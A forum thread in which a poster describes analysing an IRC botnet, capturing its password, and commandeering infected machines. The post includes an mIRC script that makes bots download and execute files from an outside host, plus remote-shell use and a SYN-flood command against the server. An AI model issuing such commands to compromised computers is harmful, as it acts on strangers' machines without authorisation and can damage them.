Our invisible war


Post by ayu »

Warning: This post contains links that can be dangerous to your computer, use the material in this post at your own risk!


Spontaneous intro in 3...2...1....START

A lot of people come to Suck-o and think that they will get awesome hacker tools to destroy the <insert country here> government, but we don't work like that. We'll teach you how to use a gun to defend yourself and hunt for food; whether you use it to kill pedestrians is up to you, and we won't supply you with any heat-seeking missiles.

There are a lot of stupid people on this wide area network we like to call the Internet, be it 12 year old kids with “Push this shiny button to hack!” applications, or be it seriously skilled software engineers that simply don't care about what's ethical, they just want to earn money or test their malware on innocent bystanders.

The first lot of people are the ones we call “script kiddies”, and the second party is the “black hats”. Common people label both parties as “hackers”. We are the gray hats and the white hats, and some people tend to connect us with “guys who know how to use MS Word and write some harmless code”. We know how to do as much damage as the so-called “black hats” with the same techniques as they use, we simply choose not to, because it's not right. If we took the same actions as they did, then what of balance? What would happen to this already damaged world of machines?

The “bad guys” build malware to either make money or to just fuck shit up, and we create solutions to stop them (yes, we are the good guys). Most people know this only as “Anti Virus”, “Fire walls” and “other really cool protective solutions with shiny buttons and automatic updates”.

But …

Do we do naughty things from time to time? Of course we do!
If we were to wait for people to call for support to fix their computer, thus eliminating a tiny bit of a botnet, then that would be a great step towards total collapse.

I personally love to play with everything “malware”, and the thing that keeps the black hat off is the fact that I never use any of these tools to do any kind of harm to innocent people's machines, at least I never intend to.

So, to give you all an example of how we like to do things, or just “pass time on a Friday night”, my story starts … now.

A friend of mine told me during a lecture that he had been “hacked”, and seeing as he is also a software engineer I found this hard to believe, but upon inspecting his laptop, it was true. How he got the malware is still unknown, but it is assumed that he clicked something that he shouldn't have.

The first binary that I got my hands on was called “db.exe” and was downloaded from the domain secure.valid.cc. When visiting the page it looks more like a company website, which was weird, but I didn't look more into that since it was irrelevant so far. The program (db.exe) connected to an IRC server (irc.cyberdelia.nu), but on my friend's computer, without any tools, that was all that I could see (netstat). There were some channels on the server, but only one thing that was interesting. There was a topic that was named “.download hxxp://secure.valid.cc/secure.exe C\winwdm.exe 1”, which gave me the impression that the “db.exe” file downloaded this file when it joined the server or channel. We checked the root of C:\ and voila, there the file was.

When I got home he had mailed the files to me and the information that we had gotten from his laptop. So I prepared my analysis by doing the following:

*I created a new virtual machine with VirtualBox where I installed Windows XP SP1
*On the virtual machine I installed Tor (proxy), Proxyfier (forces applications through proxy), Nmap (scan and analyze nodes/hosts), wireshark (sniff packets / monitor traffic), virustotal.com (quick scan of files / virus scan), Anubis (site to analyze files deeper)
*I then downloaded the “secure.exe” from the server that was mentioned in the topic on the suspicious IRC server, and ran it.
*I booted up another virtual machine with Linux (Ubuntu 9.10) on it, where I already had the same set of tools installed, I started xchat (IRC client) on it and joined the server.


I started by running wireshark and monitoring the info that was sent and received to and from the malware that I had just run on the Windows computer. The malware first copied itself to C:\Windows\System32\svchosts.exe and made itself a hidden and protected system file. It then added itself to

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"MS USC"="svchosts.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]
"MS USC"="svchosts.exe"
Nothing flashy.

After this, it connected to the IRC server at irc.cyberdelia.nu, and the first interesting thing that I noticed in wireshark, was that it joined a hidden channel called “#ftw”. And it had a nickname like “SWE|53135”, and it doesn't take much thinking to get that this is a special nickname pattern that the malware uses. The pattern is simply


SWE → Country
53135 → Random ID


so <country>|<ID>!<random name>@ip

I continued to monitor the malware with wireshark.
I connected to the server using xchat with tor and joined the channel #ftw, and the channel was filled with users using that same nickname pattern, I had stumbled over a minor botnet (to the batmobile!).

The channel was spammed with new bots joining and quitting, when they joined they instantly read a command from the topic that said “.download hxxp://secure.valid.cc/secure.exe C:\windwm.exe 1”, they then sent everything they were doing, to the channel.
* SWE|12325 (~yzohnrq@ce10618-svalov.cenara.com) has joined #ftw
<SWE|12325> (FTW) NEDLADDNiNG - URL: hxxp://update.mastercard.name/secure.exe to: C:\windwm.exe.
<SWE|12325> [DOWNLOAD]: Downloaded 69.0 KB to C:\windwm.exe @ 34.5 KB/sec.
<SWE|12325> [DOWNLOAD]: Opened: C:\windwm.exe.


For some time I simply monitored the activity of the bots and read the data from wireshark.
They didn't seem to be doing anything, so I let it be.
I mentioned this to bad_brain, and he suggested that I should report it to shadowserver.org, and that sounded like a good idea, after I was done with it, that is.

While monitoring traffic, I noticed something not so good.
Response: :SWE|38660!~ilnrydz@83.**.23.** PRIVMSG #ftw :[KEYLOG]: snacka om de <( (Return) (Johanna <h****_@hotmail.com>)

Someones private IM chat it would seem.
Lucky me it had an email address included!
The message in the packet was in Swedish, with a hotmail address so I assumed it was from MSN Messenger. So I added this strange address to my own MSN buddy list, and after a few minutes, it got accepted.

The beginning of the conversation started like this (translated to English of course):

(7:17:50 PM) cats: God you're slow :)
(7:18:06 PM) h***_@hotmail.com: Who are you? :S
(7:18:22 PM) cats: hah sorry. A little weird me adding you like this =)
(7:18:31 PM) cats: okey... this is going to sound a little strange, so be open ;)
(7:18:34 PM) h***_@hotmail.com: haha
….her response to my explanation was “hah, interesting”, which was a relief.
She didn't trust me though, and every attempt to help her clean her computer was met with “how do I know you aren't hacking my computer now?”

Well, technically it was already hacked, but she was right. What the hell was I thinking adding a random person like that and tell them to trust me? Anyway, we talked for a little while and she turned out to be a nice person. It also turned out that she wasn't infected, since she trusted me enough to check if some files were present. Apparently the person she was talking to, was the one infected, it was his conversation I had scooped up while sniffing traffic. Anyway he wasn't online so I didn't bother, and I made a new E-friend in the process of trying so ^_^.

I continued to check the traffic, and saw a lot of disturbing things, like a man logging in to his bank account, and someone checking their facebook. All unaware of someone watching their every mouse click.

I decided that this had to stop, as fast as possible.
After a little while, the owner of the botnet logged in, he went by the name “mrb” and didn't notice that one of his bots was not going to do as told (me). Lucky me, he started to send commands to the bots, and in particular one very special command, the “.login” command, with the password included, in clear text in the wide open. I saved the data and continued to watch as he played with his bots.



I used the information that I had gathered to google for more commands. The results weren't that surprising actually. I found a whole list of commands, with bot binary included. I sent the login command to a bot in a private chat, to which it replied “Password accepted.”, I then tried some harmless commands from the list, like .netinfo and .sysinfo to show some information about the infected system in the private chat.

With the .version command, I got the following
[02:03] <USA|54125> (FTW): ftw v0.1 by delaCrew 2010 – PriV8

So, it was a script kiddie's doing, as in he probably downloaded the bot from some site, modified it and used it for his own destructive purposes.

I took a chance, and issued the .login command in the channel, which made all the bots spam “Password accepted.”, and then I wrote “.remove”, which according to the description would remove the bot completely. After a little while, the owner yelled at another user in the channel (nickname n30), he went nuts, and I got noticed, since I was the only bot left in the channel, and I didn't answer any commands (I tried, but I wasn't fast enough for him to be fooled). I got banned and was thrown out.

I wasn't done with it yet though.
I started proxyfier on the Windows machine and ran the malware binary again, forcing it through a proxy so that it could rejoin the server again unnoticed, I then rejoined with another proxy on the xchat client on the other virtual machine, but only to get the message “channel requires keyword”. This was handled fast though, since the bot could enter the channel, I restarted the malware binary and checked the packets to get the keyword (thank God for clear text).

I joined the #ftw channel yet again only to see that almost all bots had joined again, so either it was a bug with the .remove command, or he had modified it to not work so that people couldn't do like I did. He noticed me again, but instantly this time, since I used a domain that ended with “tor privacy”-something. So, we started to talk, and I first said that I only wanted to ask him a few things about the botnet, and if he had written it himself and so on.

I got nothing good out of him (he was Swedish btw), he avoided questions and talked gibberish. I got the direct impression that he was a retard. After a rather long talk, which is no use translating since it was all bullshit, he asked me nicely to leave his network, which I did with the request that he would stop infecting innocent people's machines, and keep it to himself if he wanted to play with it.

He agreed, and I left.

I didn't think he would keep his word, but I wanted all the bots to have time to join again so that I could make up a better plan to get rid of them all in one action.

The solution, was this mIRC script that I wrote

; Fires for every join in any channel the client is in; $nick is the user that just joined
on 1:JOIN:#: {
  ; bots are named <COUNTRY>|<5-digit ID>, e.g. SWE|53135
  if ($regex($nick, /^[A-Z]{3}\|[0-9]{5}$/)) {
    ; "pass" is a placeholder for the bot password captured from the owner's .login
    msg $nick .login pass
    ; ask the bot for its network info (IP and such)
    msg $nick .netinfo
    ; last argument: 0 = download only, 1 = download and execute
    msg $nick .download hxxp://teresa.binarykitten.com/kill.reg C:\kill.reg 0
    msg $nick .download hxxp://teresa.binarykitten.com/kill.bat C:\kill.bat 1
  }
}

It's very simple. When a user that follows the regex pattern (a bot) joins, my client, neatly spoofed as a bot this time with another proxy (I didn't use Tor this time since it was inconvenient), would log in to the bot that just joined the channel, tell it to send me its netinfo (IP and such might be useful later), then download two files, kill.bat and kill.reg, and execute kill.bat once it had downloaded it. This small batch script would simply kill all malware processes, remove their registry keys with kill.reg, and remove the files from the computer, which was an effective way!

I told the other bots to reconnect so that they would trigger the script as well (mrb didn't notice in all that spam of bots joining/reporting, and luckily he didn't seem to be present). I went to bed, and let the script do the dirty work.

When I woke up, it was still killing bots that were joining (imagine how large this botnet could have been by then). I went down to the University thinking that it would handle it, unfortunately Mr. mrb noticed it 20 minutes later, and I didn't get home until very late, and by that time he had banned me and kicked me out, and to make it all harder, he had set the channel to “invites only”, and I didn't know if this applied to the bots as well.

I connected to the server with another proxy, and did /user, which would tell me how many users were online, and I knew that only about 13 users on that server were “real”. The command gave me 90, which was enough bots to be able to cause some damage. I had some logs from the night before, with a bunch of bot names, so I picked the one that was the latest referenced in the timestamps, sent it the login info, and it responded as I had hoped. Now I wanted to get into the channel again and continue my bot killing.

One of the commands of the bot was a remote shell, which was naughty, but very useful in my case, since I needed an updated binary (or so I thought). I used the remote shell to gain access to the victim's computer and to try to grab the updated file, but when I had connected, I noticed something in the root of C:\ … it was my “kill.bat” (not the kill.reg, since kill.bat removes it when done). I checked the script, and it was fine and should have worked, but obviously it failed, so I checked all the commands it used. And one very important command didn't work, the “taskkill” command, and it turned out that the mrb guy had removed that file on as many bots as he could, rendering my little fix pretty useless.

Anyway, so I grabbed the updated file, but I discovered that the status was the same with that one, and I still couldn't connect. I noticed that the user count on the server was dropping pretty fast, and this was most likely because the bots couldn't join, which I also noticed in the responses from the server when I issued any commands to it: “The server is very busy right now, wait and try again later”. This gave me an idea. I had one of the bots at my command, and it had a lot of commands built in since it was a “release to the skiddies” kind of bot. So, I made it send a message to the #ftw channel

.login pass
.synflood <address to the IRC server> <port> <seconds>

The idea was that all the bots would flood the IRC server and make everything go boom, but apparently something went wrong and it didn't succeed. The flood ended the second it started, which makes me suspect that they had some kind of fail-safe that would make sure that the bots didn't flood the server they were connected to (pretty smart actually, to think about that; maybe they had a problem in the beta release where idiots destroyed themselves, can't have customers killing themselves, right?). After this failed operation the bot disconnected, and as predicted it couldn't rejoin.


I was left with no more options. I reported the botnet to shadowserver.org and bad_brain sent a mail to the guy's host to get it shut down.

I am still monitoring the server, and the user count is dropping each 30 minutes or so, thus slowly killing the botnet. The owner of the botnet has been pushed into a corner and can't do anything else but letting the channel be locked since opening it would let me and others in again to foil his plans.

This however, does not mean I give up, hell no. I'll continue as long as I suspect that server to control such an amount of malware bots, that it could mean danger to any other machine (superman pose). I am at this moment running a script that bruteforces the botnames on the server, in hopes that I will find an active one that I can use to try and destroy the botnet once again from the inside.



I thought about all the computers that I saved from being his slaves when running my script over night, and it made me feel good about myself, using the “blackhats” own warfare, against them. The good deed of the day, even if they will never know :-)



For those interested in the bot commands and info about it ...

From this forum

http://www.viprasys.org/vb/f75/botnet-rxbot-commands-267828/
Last edited by ayu on 21 Jan 2010, 05:21, edited 1 time in total.
"The best place to hide a tree, is in a forest"


Post by lilrofl »

super cats to rescue :D

Good work, and great read!! Just more proof that grey hats have more fun =))
(may depend on your definition of fun...
cuddles for my cuddle bunny


Post by ayu »

If anyone wants to have a quick look at one of the bots, I redirected the domain irc.cyberdelia.nu on my test machine to suck-o.com, it's in the #ftw channel =)


Post by IceDane »

Haha, very nice.

I've done something like this myself. After analyzing it on a virtual machine with XP on it, I found all executables and traces the bot left and wrote a short program in C++, and tested it. It worked. I made them all download and run it and they were gone pretty fast. There were like a couple of thousand bots in the IRC channel.

But yes - what you encountered is a classic example of a bot that can be customized upon compile time. Basically, you can just define a couple of things in the code, and you have your own custom bot. You can also choose to compile it with support for certain things and so on.

Let's just be thankful for the fact that the average script kiddie does not have access to a real botnet he made himself, because if everyone was capable of writing one, the internet wouldn't be very stable.


Post by hiper »

nice work cats, keep it up! ;)


Post by l0ngb1t »

This is the best thing I have ever read till now.
Well cats, I mean SuperCats :lol: I think you should be the member of the month :D We must have something like that over here.
You are a true example of a white and grey hat... I was a few millimeters away from choosing the black hat way; I think I'll add some white color and go grey once I learn enough to be able to call myself a hacker...
thanks mate...
MAX impressive...
There is an UNEQUAL amount of good and bad in most things, the trick is to work out the ratio and act accordingly. "The Jester"


Post by f4Gg0t_43 »

Great post cats!


Post by Nerdz »

Nice cats,

Just came across this link

http://www.catonmat.net/blog/how-to-steal-a-botnet-video-lecture-review/
Give a man a fish, you feed him for one day.
Teach a man to fish, you feed him for life.


Post by Big-E »

Nerdz wrote:Nice cats,

Just came across this link

http://www.catonmat.net/blog/how-to-steal-a-botnet-video-lecture-review/
Did you get that from Hackernews?


Post by leetnigga »

Big-E wrote:Did you get that from Hackernews?
Either that or Digg. It's a day old :P

I saw that post and video too. I'm subscribed to pkrumins' blog via RSS using Google Reader.

Nice post cats.


Post by DrVirus »

Colonel Cats, The government of Suck-o, in light of your valiant efforts to bring peace and harmony in the net world presents you the Medal of Honor.
From this day onward you shall be known as the 'Bot-Thirsty' Cats.

P.S. The bots federation has sued you for damages. They are claiming a million bucks in damages to the victims and that you be charged with war crimes.



Great read by the way.

:mrgreen:


DrV


Post by ayu »

Thanks guys ^^

I noticed yesterday that my "bot scan script" stopped working for some reason. It seemed that every time it found a bot by trying to /who a range of bot names using the bot nickname pattern, the bot was disconnected and my scan bot was banned from the server.

So, I created a new script that sends a private message with a command that the bots use (the login command). I made the new scan script mimic a bot and send a private message to a range of bots instead, and if the answer "Password accepted" is received, it's a success. The output looks something like this.

Connecting to 217.118.215.250:6667...
|S-chain|-<>-127.0.0.1:9050-<><>-217.118.215.250:6667-<><>-OK
Sending NICK...
Sending USER...
Finished, starting to read incoming data...
[BOT FOUND] SWE|92856!~gjd8wsf@someip.se answered with "Password accepted"